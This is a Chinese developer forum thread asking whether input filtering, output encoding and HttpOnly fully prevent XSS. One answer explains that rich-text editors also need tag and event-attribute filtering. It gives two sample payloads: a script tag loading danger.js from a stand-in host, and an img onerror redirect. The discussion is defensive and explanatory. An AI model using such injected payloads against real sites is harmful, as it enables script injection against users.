XSS攻击 使用输入过滤和输出转码再配合httponly就一定安全吗?

前天腾讯面试时,被问到一个问题: XSS攻击使用输入过滤和输出转码再配合httponly就一定安全吗?(最好能贴代码举栗子说明下,谢谢)

阅读 4.6k
2 个回答

如果页面上有类似于html编辑器之类的东西,那需要再过滤掉一些标签和属性吧,比如<link>,<script> <iframe>标签, 元素事件, image的onerror之类的。
link会改变样式。script标签可以引入有害的js。元素事件和某些属性有执行js代码的能力 (如img的onerror属性)

举个例子
<script src="http://a/danger.js&quot;>
<img onerror="window.location.href='http://danger.com'">

兄弟最近美团技术有针对XSS攻击发布了专栏,你可以去看看,明确的说XSS没有绝得防御的方法, 只能说通过自己代码的规范前后端的共同协作来避免XSS攻击的发生。 希望你可以去看看 那篇文章很有营养,我这里也收藏了具体的预防XSS的方法.希望对你有所帮助。

撰写回答
你尚未登录,登录后可以
  • 和开发者交流问题的细节
  • 关注并接收问题和回答的更新提醒
  • 参与内容的编辑和改进,让解决方法与时俱进
推荐问题